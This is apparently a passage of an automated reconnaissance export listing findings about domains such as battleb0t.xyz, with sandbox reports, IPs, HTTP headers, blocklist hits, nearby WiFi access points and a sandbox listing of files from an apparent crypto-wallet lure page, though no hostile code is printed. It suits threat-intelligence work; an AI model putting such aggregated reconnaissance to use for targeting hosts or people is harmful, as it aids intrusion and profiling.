u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df038cf0017f8b478d.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{64fca9a9-eac7-11ed-8a3e-080027a190c2}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dffb9a278b09a9867d.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{64fca9ab-eac7-11ed-8a3e-080027a190c2}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"b38d7abaf0f5f8fb484f9be1484e98a17ea16df2_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "f0438febff768476c4bd646204034239a5fc20d9_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "f9fa0444b908def7e2cacce9c162c39a60167a27_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "jqueryjs_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "web3.min_1_.js" has type "data"- [targetUID: N/A]\n "slider_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "web3-provider.min_1_.js" has type "data"- [targetUID: N/A]\n "ethers-5.2.umd.min_1_.js" has type "data"- [targetUID: N/A]\n "walletbundle_1_.js" has type "UTF-8 Unicode text with very long lines with escape sequences"- [targetUID: N/A]\n "index_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ethereumjs-tx-1.3.3.min_1_.js" has type "data"- [targetUID: N/A]\n "urlref_httpslens-protocoll.xyzwebcindex.php" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "index_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "sweetalert2.all_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "jquery-3.6.0.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "dark_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00001416]\n "invisible_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "main.34d2eea7_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "axios.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ABI_1_.js" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00001416]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF038CF0017F8B478D.TMP" has type "data"- Location: [%TEMP%\\~DF038CF0017F8B478D.TMP]- [targetUID: 00000000-00001416]\n "~DFFB9A278B09A9867D.TMP" has type "data"- Location: [%TEMP%\\~DFFB9A278B09A9867D.TMP]- [targetUID: 00000000-00001416]\n "~DF79C8B99757FDF652.TMP" has type "data"- Location: [%TEMP%\\~DF79C8B99757FDF652.TMP]- [targetUID: 00000000-00001416]\n "~DF3E2144E69F260778.TMP" has type "data"- Location: [%TEMP%\\~DF3E2144E69F260778.TMP]- [targetUID: 00000000-00001416]\n "favicon_1_.ico" has type "MS Windows icon resource - 3 icons 16x16 32 bits/pixel 32x32 32 bits/pixel"- [targetUID: N/A]\n "css2_1_.css" has type "ASCII text"- [targetUID: N/A]\n "_64FCA9AB-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._64FCA9A9-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_6E587A84-EAC7-11ED-8A3E-080027A190C2_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "inter_1_.css" has type "ASCII text"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "jquery.cookie.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "C1TXDP2K.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C1TXDP2K.txt]- [targetUID: 00000000-00001416]\n "NN4OYYV3.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NN4OYYV3.txt]- [targetUID: 00000 |
| 2023-05-12 02:46:53 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | cloudflare.com | skip.ns.cloudflare.com |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5d0de95ea502c0-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.97.1 |
| 2023-05-12 02:52:33 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.screentogif.com/downloads', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e38_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_e38_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_e38_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_e38_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3640"\n "IsoScope_e38_ConnHashTable<3640>_HashTable_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_e38_IE_EarlyTabStart_0xe94_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3640"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "104.18.28.243:443"\n "192.30.255.117:443"\n "192.229.163.25:443"\n "20.125.62.241:443"\n "142.251.2.157:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.github.com"\n "c.clarity.ms"\n "platform.twitter.com"\n "query.prod.cms.msn.com"\n "stats.g.doubleclick.net"\n "teredo.ipv6.microsoft.com"\n "unicons.iconscout.com"\n "www.screentogif.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "js_2_.js")\n Found string "platform.twitter.com" (Indicator: "dir "; File: "PCAP")\n file/memory contains long string with (Indicator: "dir "; File: "SSL")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"Recorder-Old.220d6f4d_1_.gif" has type "GIF image data version 89a 574 x 465" and extension "gif"\n "Editor.3586032f_1_.gif" has type "GIF image data version 89a 743 x 521" and extension "gif"\n "Recorder-New.e3003335_1_.gif" has type "GIF image data version 89a 408 x 369" and extension "gif"\n "Loam.343c6915_1_.png" has type "PNG image data 1000 x 1000 8-bit/color RGBA non-interlaced" and extension "png"\n "Elmah.21a45df7_1_.png" has type "PNG image data 836 x 536 8-bit/color RGBA non-interlaced" and extension "png"\n "Noderaider.be4e9c67_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data big-endian direntries=0] progressive precision 8 400x400 components 3" and extension "jpg"\n "Whsr.385f0a38_1_.png" has type "PNG image data 512 x 512 8-bit colormap non-interlaced" and extension "png"\n "Bluepoint.27f1ef7b_1_.png" has type "PNG image data 307 x 90 8-bit/color RGBA non-interlaced" and extension "png"\n "logo.d2151712_1_.png" has type "PNG image data 256 x 256 8-bit/color RGBA non-interlaced" and extension "png"\n "c_1_.gif" has type "GIF image data version 89a 1 x 1" and extension "gif"\n "collect_1_.gif" has type "GIF image data version 89a 1 x 1" and extension "gif"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df9094ab384f940ba2.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{3d8264cb-eb38-11ed-a571-080027d31f80}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\imagestore\\3mt7jhv\\imagestore.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfa6cf4e6309c1db59.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{4b5d2cdb-eb38-11ed-a571-080027d31f80}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{3d8264cb-eb38-11ed-a571-080027d31f80}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{4b5d2cdb-eb38-11ed-a571-080027d31f80}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfa6cf4e6309c1db59.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{3d8264c9-eb38-11ed-a571-080027d31f80}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dff161ee818d5dda45.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Kreiseder.98f158f6_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "Jetbrains.69724121_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "Fosshub.48002ff1_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "NDepend.943229b8_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "BrunnerBi.b7b9057f_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "Windows.19802f6e_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "Microsoft.a1fb1c95_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "app.d1265516_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "chunk-vendors.7bff679b_1_.js" has type "UTF-8 Unicode text with very long lines with LF NEL line terminators"- [targetUID: N/A]\n "Recorder-Old.220d6f4d_1_.gif" has type "GIF image data version 89a 574 x 465"- [targetUID: N/A]\n "app.7abc533d_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "Editor.3586032f_1_.gif" has type "GIF image data version 89a 743 x 521"- [targetUID: N/A]\n "Recorder-New.e3003335_1_.gif" has type "GIF image data version 89a 408 x 369"- [targetUID: N/A]\n "js_2_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "widgets_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "Loam.343c6915_1_.png" has type "PNG image data 1000 x 1000 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Cab2DE8.tmp" has type "data"- Location: [%TEMP%\\Cab2DE8.tmp]- [targetUID: 00000000-00002720]\n "clarity_1_.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "line_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "analytics_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "Elmah.21a45df7_1_.png" has type "PNG image data 836 x 536 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Noderaider.be4e9c67_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data big-endian direntries=0] progressive precision 8 400x400 components 3"- [targetUID: N/A]\n "unicons-10_1_.eot" has type "Embedded OpenType (EOT) unicons-10 family"- [targetUID: N/A]\n "releases_1_.json" has type "JSON data"- [targetUID: N/A]\n "unicons-17_1_.eot" has type "Embedded OpenType (EOT) unicons-17 family"- [targetUID: N/A]\n "unicons-18_1_.eot" has type "Embedded OpenType (EOT) unicons-18 family"- [targetUID: N/A]\n "unicons-5_1_.eot" has type "Embedded OpenType (EOT) unicons-5 family"- [targetUID: N/A]\n "unicons-15_1_.eot" has type "Embedded OpenType (EOT) unicons-15 family"- [targetUID: N/A]\n "unicons-12_1_.eot" | 185.199.108.153 |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.160): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:17:44 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Twitter (Category: social)
https://twitter.com/_BattleB0t_ | _BattleB0t_ |
| 2023-05-12 02:45:51 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 37.751, -97.822 | 2606:4700:3031::6815:6a6 |
| 2023-05-12 03:24:00 | Similar Domain | Yes | TLD Searcher | 1 | 0 | 1 | 0 | None | ayhu.de | ayhu.xyz |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.82): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:2082 | 104.21.6.166 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Microsoft acquisitions | battleb0t.github.io |
| 2023-05-12 03:23:38 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.14:443 | 188.114.96.0/24 |
| 2023-05-12 03:03:34 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00d.github.io |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Open-source software hosting facilities | battleb0t.github.io |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SMC (Net ID: 00:04:E2:D0:65:C0) | 50.8897, 6.0563 |
| 2023-05-12 02:54:57 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["7c4567d3ec4c10ff-ORD"]} | 2a06:98c1:3120::1 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES_RT-205 (Net ID: 00:12:BF:FE:00:5F) | 40.2024, 29.0398 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PHK140 (Net ID: 00:01:E3:06:9D:0B) | 52.3759, 4.8975 |
| 2023-05-12 03:08:48 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.226 | 104.196.30.220 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | eduwifi (Net ID: 00:02:2D:54:36:B1) | 37.7642, -122.3993 |
| 2023-05-12 02:56:31 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://www.rstudio.com/products/rstudio/download/),', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.231.208.25:443"\n "104.196.30.220:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_9a0_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_9a0_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_9a0_IESQMMUTEX_0_303"\n "IsoScope_9a0_IESQMMUTEX_0_331"\n "IsoScope_9a0_ConnHashTable<2464>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2464"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_9a0_IE_EarlyTabStart_0xf44_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "QK1MCF28.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QK1MCF28.txt]- [targetUID: 00000000-00002464]\n "_B73DAEC5-28A5-11ED-91FC-0800278F1A1D_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_2_.json" has type "ASCII text with no line terminators"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00002464]\n "Y43HX953.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Y43HX953.txt]- [targetUID: 00000000-00002464]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00003364]\n "57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157]- [targetUID: 00000000-00002464]\n "~DFF06F6526CD877716.TMP" has type "data"- Location: [%TEMP%\\~DFF06F6526CD877716.TMP]- [targetUID: 00000000-00002464]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF185D4F22325C47E3.TMP" has type "data"- Location: [%TEMP%\\~DF185D4F22325C47E3.TMP]- [targetUID: 00000000-00002464]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00002464]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002464]\n "~DF0774C0318426B25C.TMP" has type "data"- Location: [%TEMP%\\~DF0774C0318426B25C.TMP]- [targetUID: 00000000-00002464]\n "WXEY61N5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\WXEY61N5.txt]- [targetUID: 00000000-00003364]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.rstudio.com/products/rstudio/download/"- [Source: Input]\n Pattern match: "https://www.rstudio.com"- [Source: Input]'}], u'threat_level': 0, u'size': None, u'job_id': u'630e944ecad9df06be085b88', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [u'35.231.208.25', u'104.196.30.220'], u'sha256': u'072e3ec83c217f53774393c7c55b71b6ac38b677006d238619898149b4ae8ff0', u'sha512': u'6373a2e033dac711da1fdb13838aa849d4eaa2844baa689de28f060328cc0e1980823496573f2cdbafaa48fa2740425e7d1121d4ed136f2300d338fa96e95b78', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://www.rstudio.com/products/rstudio/download/),', u'submission_id': u'630e944fcad9df06be085b89', u'created_at': u'2022-08-30T22:50:55+00:00', u'filename': None}], u'analysis_start_time': u'2022-08-30T22:50:55+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 2, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 5, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'b0994bcbd06abc41e182ae36f000740c', u'network_mode': u'default', u'processes': [], u'sha1': u'bd7835e0d2e2ad5d7166a9d745decc0958ec89e6', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 32 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}] | 104.196.30.220 |
| 2023-05-12 03:31:23 | Malicious IP on Same Subnet | Yes | blocklist.de | 0 | 0 | 4 | 0 | None | blocklist.de List [46.101.128.0/17]
http://lists.blocklist.de/lists/all.txt | 46.101.128.0/17 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-cache-hits: 0 | {"content-length": "1591", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-1999\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-lga21982-LGA", "x-origin-cache": "HIT", "x-cache": "MISS", "x-github-request-id": "69FA:0168:26C3619:3A6662D:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "81f392d6f8601ba9f7017cc835b0845172eec1e9", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.299752,VS0,VE13", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/css; charset=utf-8"} |
